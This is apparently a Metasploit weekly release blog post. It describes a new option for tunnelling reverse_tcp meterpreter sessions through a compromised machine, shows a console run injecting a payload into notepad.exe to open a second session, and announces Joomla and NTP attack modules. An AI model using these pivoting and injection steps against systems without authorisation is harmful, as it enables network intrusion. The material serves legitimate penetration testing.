Last updated at Fri, 29 Sep 2017 18:42:22 GMT

Aaaaaand we're back! Last week was the first weekly update of the year and it comes with a super fun stuff.


The latest update allows you to tunnel reverse_tcp sessions over a compromised machine in a slightly less painful way. There is now a new datastore option, ReverseListenerComm, which lets you tell a meterpreter session tunnel connections back to your payload handler. Here's an example run to give you the idea:

msf exploit(payload_inject) > show options  
Module options (exploit/windows/local/payload_inject):  
   Name        Current Setting  Required  Description  
   ----        ---------------  --------  -----------  
   NEWPROCESS  true             no        New notepad.exe to inject to  
   PID                          no        Process Identifier to inject of process to inject payload.  
   SESSION                      yes       The session to run this module on.   
Payload options (windows/meterpreter/reverse_tcp):  
   Name      Current Setting  Required  Description  
   ----      ---------------  --------  -----------  
   EXITFUNC  process          yes       Exit technique (accepted: , , seh, thread, process, none)  
   LHOST        yes       The listen address  
   LPORT     4444             yes       The listen port  
Exploit target:  
   Id  Name  
   --  ----  
   0   Windows  
msf exploit(payload_inject) > set ReverseListenerComm 1  
ReverseListenerComm => 1  
msf exploit(payload_inject) > set SESSION 1  
SESSION => 1  
msf exploit(payload_inject) > run   
[*] Started reverse handler on via the meterpreter on session 1  
[*] Running module against WIN-2DE8F2QP867  
[*] Launching notepad.exe...  
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 3092  
[*] Sending stage (884270 bytes)  
[*] Meterpreter session 2 opened ( -> at 2015-05-20 00:09:44 +0100  
meterpreter >  

The really important line there is this:

[*] Started reverse handler on via the meterpreter on session 1

The compromised machine is listening on its localhost for the new connection, but it doesn't have to be localhost, you can tell it to listen on an external address and use psexec against a second internal machine. This used be possible by creating a route and setting your LHOST to a victim machine's IP address within that route, but it wasn't really clear how to do it and the settings were quite error prone; now it's just a single option to tell Metasploit explicitly where to listen for the payload.

Super fun modules


This update comes with a pre-authentication exploit for Joomla, the popular CMS, another in a rich and storied history of deserialization bugs. We've also abstracted some common things into a Joomla mixin, so the next time one of these comes along, writing the exploit is will be faster and easier.

Hacking Time

From the module description:

The end goal is to cause ntpd to declare the legitimate peers "false tickers" and choose the attacking clients as the preferred peers, allowing these peers to control time.

Now you, too, can go... NAK to the Future!

Exploit modules

Auxiliary and post modules

As always, you can get all these modules and improvements with a simple msfupdate and the full diff is available on GitHub:  4.11.5-2015121501...4.11.5-2016010401